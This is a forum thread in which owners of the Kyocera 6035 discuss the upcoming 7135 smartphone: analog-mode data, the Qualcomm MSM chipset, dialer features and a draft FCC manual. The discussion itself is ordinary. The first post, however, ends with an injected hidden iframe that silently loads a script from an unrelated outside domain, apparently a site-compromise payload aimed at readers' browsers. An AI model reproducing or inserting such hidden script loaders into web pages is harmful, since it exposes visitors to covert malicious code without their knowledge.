+ Reply to Thread

Technical questions (guesses?) on the 7135...

Does anyone know if the modem in the 7135 will be able to work while the phone is in analog mode? I have a 6035, and apparently there are design issues that prevent this in the 6035. This would be helpful when outside digital coverage so that you could still have net access...limited as it may be...<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Other 6035 features on 7135?

The Kyocera rep on the intro video made a comment that the palm dialer application didn't make it from the 6035, indicating customers preferred to use the keypad.

It got me to wondering about other 'hidden' useful features of the 6035...

Most importantly did they keep the ability to turn the phone on and off at specified times?

Did they keep the ability to dial any number from any palm app by selecting the number?

Did they keep the ability to set the palm time from the phone time?

[quote:d33b9d9b99]Most importantly did they keep the ability to turn the phone on and off at specified times?[/quote:d33b9d9b99]

I believe that when I watched the video, though the guy didn't say it verbally, you could see (if you look closely) that at some point (maybe about halfway through the video) when he showed the screen, it said "Phone is off" or something like that. So it must be possible and has the ability to show that screen to prove to the pushy stewardess/flight attendant/Waitress In The Sky, much like our beloved 6035.

~Markito

The answer above was from me, Markito Burrito, not a "Guest", but I forgot to log in since I'm at an internet cafe right now.
    ~'kito

It will not do data in analog. IT's not the phone, but the CDMA chipset that does this. THe CDMA chip is know as a MSM (mobile Station Modem). It controls all the communications, voice and data. QUALCOMM does not have analog data support in thier chips.

I have no idea what MSM is in this handset. I would imagine the 5100 or 5105. The 6035 had a 3100. Since they said the handset was 1xRTT, that leads me to believe it has to be the 5100 or 5105.

You can see what multi-carrier chips QUALCOMM has here

Registered User All-Purpose Guru's Avatar

Re: Other 6035 features on 7135?

[quote:f1abfe8771]Did they keep the ability to dial any number from any palm app by selecting the number?[/quote:f1abfe8771]

Ooh, that's a good one. The dialer button is what triggers this kind of dialing, and the new phone probably won't have one, if there's no dialer application.

That would frost me. One of the coolest features of this thing is the ability to do that. (it's a little thing, but a very well-thought-out thing.)

Then again, maybe highlighting the number and pressing SEND could be coerced into doing the same thing.
    --apg

"Invention, my dear friends, is ninety-three percent perspiration, six percent electricity, four percent evaporation, and two percent butterscotch ripple." --W. Wonka

The graffitti pad still has a little phone icon instead of the calculator, so it appears they paid attention to keeping the good little things.

Also, it looks as if they have moved the backlight button from being the infared lens cover to its own button at the bottom of the dial pad. Would be real nice to map this button to do one touch beaming. - jt
    - Archnemysis

Re: Technical questions (guesses?) on the 7135...

[quote:0b321948d2="98GSR"]Does anyone know if the modem in the 7135 will be able to work while the phone is in analog mode? I have a 6035, and apparently there are design issues that prevent this in the 6035. This would be helpful when outside digital coverage so that you could still have net access...limited as it may be...[/quote:0b321948d2]I have connected to the internet while in Analog mode inside an IMAX theatre via the 6035. Worked fine.

Questions answered and new questions to ponder...

I was reading the instructions for the phone and it says that the on screen dialer [i:01105619f1]is [/i:01105619f1]available. So i guess the rep didn't quite know about the dialer?...

Now there's a new question...
    On page 13, the MP3 port "to download songs" is by the headset jack and not at the bottom data port...??? that's pretty strange.... one port to transfer palm data and another port to transfer mp3's?

~Richard

[quote:f1abfe8771="David Westman"][quote:f1abfe8771="98GSR"]Does anyone know if the modem in the 7135 will be able to work while the phone is in analog mode? I have a 6035, and apparently there are design issues that prevent this in the 6035. This would be helpful when outside digital coverage so that you could still have net access...limited as it may be...[/quote:f1abfe8771]I have connected to the internet while in Analog mode inside an IMAX theatre via the 6035. Worked fine.[/quote:f1abfe8771]

Absolutely impossible. There is no support by the chipset for analog data.

Re: Questions answered and new questions to ponder...

[quote:aa69899f5a="unten44"]I was reading the instructions for the phone and it says that the on screen dialer [i:aa69899f5a]is [/i:aa69899f5a]available. So i guess the rep didn't quite know about the dialer?...

Now there's a new question...
    On page 13, the MP3 port "to download songs" is by the headset jack and not at the bottom data port...??? that's pretty strange.... one port to transfer palm data and another port to transfer mp3's?

~Richard[/quote:aa69899f5a]

Guys, look closely at the instructions on the FCC site. It's a draft and the vast majority of the images and instructions are 6035 based. The screen captures in that document are different then the video and pictures of the 7135.

Obviously they are able to do color screen captures, yet most of the images are B/W and are cut in half as if the flip was closed on the 6035.

I agree HS. I thought that too, plus I thought that when they repeatedly said "flip closed", it often didn't seem to make sense with the function, like they were talking about the 6035's flip.

A bad cutting and pasting job by someone at Kyo while trying to get it out the door to the FCC? Yikes.

[quote:09d413b5a2="Anonymous"]The answer above was from me, Markito Burrito, not a "Guest", but I forgot to log in since I'm at an internet cafe right now.
    ~'kito[/quote:09d413b5a2]
    I'm glad I'm not the only one who forgets to log in. Senility loves company!

Dave

[quote:91c46c2a1d="Markito Burrito"]A bad cutting and pasting job by someone at Kyo while trying to get it out the door to the FCC? Yikes. [/quote:91c46c2a1d]
    My guess is all of us die-hard geeks are reading the fine details more closely than beauracrats at the FCC as they have given the 7135 their coveted seal of approval.

Dave

HotSync is correct, you cannot connect to the internet via the modem in analog mode. What the 6035 does is FORCE a check for digital services even if the phone is set to analog mode in preferences. You will notice that the light on the top of the phone changes colors as it is trying to force digital mode. I am guessing that digital services were available in the IMAX theater...maybe only a weak signal though. When I first got my 6035 back in 2001, I drove to an analog only area and was unable to connect. I saw then that the 6035 changed the light on top to GREEN as it was trying to unsuccessfully connect, which means to me that it overrides the ANALOG setting in Prefs while trying to connect.

[quote:31d9c00c43="HoTSynC"][quote:31d9c00c43="David Westman"][quote:31d9c00c43="98GSR"]Does anyone know if the modem in the 7135 will be able to work while the phone is in analog mode? I have a 6035, and apparently there are design issues that prevent this in the 6035. This would be helpful when outside digital coverage so that you could still have net access...limited as it may be...[/quote:31d9c00c43]I have connected to the internet while in Analog mode inside an IMAX theatre via the 6035. Worked fine.[/quote:31d9c00c43]

Absolutely impossible. There is no support by the chipset for analog data.[/quote:31d9c00c43]Just to make sure we're on the same page, the D (upper left corner, meaning Digital), changed to an A (for analog) once I entered the theatre. I paid for a double feature. The first movie kept meantioning a web site. While still in the theatre during the break between the movies, still getting a constant A (flip closed) I tried and connected to the internet, and checked out the web page meantioned in the first movie. After disconnecting from the internet, closed the flip, and the A (Analog - flip closed) was still there.

In response to the subsequent poster, I've not ever "forced analog" in any settings. Next time I find myself in Analog mode, I'll try it again. I'm not trying to brag or anything. I just know what I saw and know what I did.

[quote:8b31845975="David Westman"][quote:8b31845975="HoTSynC"][quote:8b31845975="David Westman"][quote:8b31845975="98GSR"]Does anyone know if the modem in the 7135 will be able to work while the phone is in analog mode? I have a 6035, and apparently there are design issues that prevent this in the 6035. This would be helpful when outside digital coverage so that you could still have net access...limited as it may be...[/quote:8b31845975]I have connected to the internet while in Analog mode inside an IMAX theatre via the 6035. Worked fine.[/quote:8b31845975]

Absolutely impossible. There is no support by the chipset for analog data.[/quote:8b31845975]Just to make sure we're on the same page, the D (upper left corner, meaning Digital), changed to an A (for analog) once I entered the theatre. I paid for a double feature. The first movie kept meantioning a web site. While still in the theatre during the break between the movies, still getting a constant A (flip closed) I tried and connected to the internet, and checked out the web page meantioned in the first movie. After disconnecting from the internet, closed the flip, and the A (Analog - flip closed) was still there.

In response to the subsequent poster, I've not ever "forced analog" in any settings. Next time I find myself in Analog mode, I'll try it again. I'm not trying to brag or anything. I just know what I saw and know what I did.[/quote:8b31845975]

Gotta listen to HoTSynC on this one. The MSM chip in the phone does not support data connection in analog. You didn't tell it to prefer analog for signal, it does that on it's own. Unless you tell it digital-only, it always tries for the best signal, which in this case would be analog. You were lucky enough that it could find enough marginal digital signal to make that data connection, after which it would have reverted to its preferred analog signal for voice.